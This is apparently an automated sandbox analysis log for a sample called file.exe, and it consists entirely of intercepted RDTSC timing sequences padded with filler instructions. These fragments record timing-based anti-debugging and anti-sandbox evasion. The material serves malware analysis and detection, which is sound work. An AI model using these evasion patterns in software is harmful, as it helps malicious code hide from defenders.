Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3CF66 second address: B3CFAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnp 00007F23947F2AF6h 0x0000000d jmp 00007F23947F2AFBh 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007F23947F2AFEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F23947F2B07h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAE661 second address: AAE665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4321D second address: B43221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43221 second address: B43246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F2394D2C4A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2394D2C4B9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B43246 second address: B43252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F23947F2AF6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4645F second address: B46480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007F2394D2C4B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F2394D2C4A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B46480 second address: B46484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4B38C second address: B4B3C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2394D2C4A6h 0x00000008 jne 00007F2394D2C4A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007F2394D2C4ABh 0x00000017 js 00007F2394D2C4B8h 0x0000001d jmp 00007F2394D2C4B2h 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4B3C4 second address: B4B3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4B3CA second address: B4B3D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A5AB second address: B4A5B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A5B1 second address: B4A5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2394D2C4B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F2394D2C4ACh 0x00000013 jnp 00007F2394D2C4A6h 0x00000019 jo 00007F2394D2C4ACh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A5E3 second address: B4A5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A5E7 second address: B4A5FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2394D2C4B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A785 second address: B4A78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A78E second address: B4A7A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2394D2C4B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A7A8 second address: B4A7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A7AE second address: B4A7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A7B4 second address: B4A7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4A7B8 second address: B4A7C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2394D2C4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4AAA9 second address: B4AAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4AAAF second address: B4AABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2394D2C4A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4AABA second address: B4AAC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F23947F2AF6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4AAC6 second address: B4AB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2394D2C4B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F2394D2C4BCh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 je 00007F2394D2C4CEh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2394D2C4B2h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4AF3C second address: B4AF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4E491 second address: B4E495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4E495 second address: B4E4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F23947F2B09h 0x0000000e jmp 00007F23947F2B03h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DBA1 second address: B4DBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DBA7 second address: B4DBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DBAB second address: B4DBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F2394D2C4A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DBBB second address: B4DBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4DEB9 second address: B4DEDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2394D2C4ACh 0x00000007 jg 00007F2394D2C4A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2394D2C4ABh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4E1BD second address: B4E1CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jo 00007F23947F2B02h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4E1CB second address: B4E1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B54180 second address: B5419D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F23947F2AFEh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5419D second address: B541A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B541A1 second address: B541CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947F2B05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F23947F2B05h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5433D second address: B54357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2394D2C4B0h 0x00000007 ja 00007F2394D2C4ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B545B6 second address: B545DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23947F2B06h 0x00000009 jmp 00007F23947F2AFFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B545DF second address: B5461F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F2394D2C4B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F2394D2C4B8h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F2394D2C4A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5461F second address: B54623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B54623 second address: B54638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2394D2C4AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B54638 second address: B5463D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5463D second address: B54649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2394D2C4A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B547D6 second address: B547DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B547DA second address: B547FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F2394D2C4A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2394D2C4B9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FC9F second address: B5FCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F23952C8E26h 0x0000000f jmp 00007F23952C8E32h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCC0 second address: B5FCC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCC6 second address: B5FCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F23952C8E34h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCE3 second address: B5FD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23947D038Fh 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007F23947D039Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F23947D0386h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5DF0A second address: B5DF14 instructions: 0x00000000 rdtsc 0x00000002 js 00007F23952C8E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5DF14 second address: B5DF1E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F23947D038Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E453 second address: B5E48B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23952C8E26h 0x00000008 jmp 00007F23952C8E2Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F23952C8E34h 0x00000015 jmp 00007F23952C8E2Eh 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EA3F second address: B5EA51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F23947D038Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EA51 second address: B5EA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jmp 00007F23952C8E38h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EA7D second address: B5EA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F05D second address: B5F063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F063 second address: B5F06D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F23947D0392h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F3A7 second address: B5F3BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jng 00007F23952C8E32h 0x00000010 jng 00007F23952C8E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F714 second address: B5F72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jng 00007F23947D0386h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6786C second address: B67887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jns 00007F23952C8E2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F23952C8E28h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67887 second address: B6788C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67B2C second address: B67B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23952C8E36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67B46 second address: B67B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F23947D0396h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67B60 second address: B67B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F23952C8E2Ch 0x00000010 jno 00007F23952C8E26h 0x00000016 jmp 00007F23952C8E39h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67B8F second address: B67B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67B95 second address: B67BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F23952C8E2Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67BAA second address: B67BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67BB0 second address: B67BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69B78 second address: B69B89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D038Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69B89 second address: B69B9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F23952C8E28h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69B9B second address: B69BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69BA1 second address: B69BAB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F23952C8E26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7277D second address: B72787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F23947D0386h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B72787 second address: B72794 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F23952C8E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B710A5 second address: B710D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D038Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F23947D0398h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B710D0 second address: B710D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71224 second address: B71228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71228 second address: B71236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F23952C8E2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71236 second address: B71242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F23947D038Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71536 second address: B7153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7180F second address: B71814 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B71ED0 second address: B71EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23952C8E32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B704E0 second address: B704FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B704FD second address: B70503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B70503 second address: B70509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B3FB second address: B7B401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7B401 second address: B7B405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B89A93 second address: B89A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B89A97 second address: B89A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B89A9B second address: B89AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B89806 second address: B8980C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C53A second address: B8C540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C540 second address: B8C558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D0394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C0A7 second address: B8C0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F23952C8E32h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C0C0 second address: B8C0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F23947D0386h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C0CB second address: B8C0D0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8C0D0 second address: B8C0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA4188 second address: BA41CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F23952C8E39h 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F23952C8E38h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA41CB second address: BA41EE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007F23947D0386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F23947D0397h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA41EE second address: BA4209 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F23952C8E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA4623 second address: BA4629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BA4629 second address: BA462F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
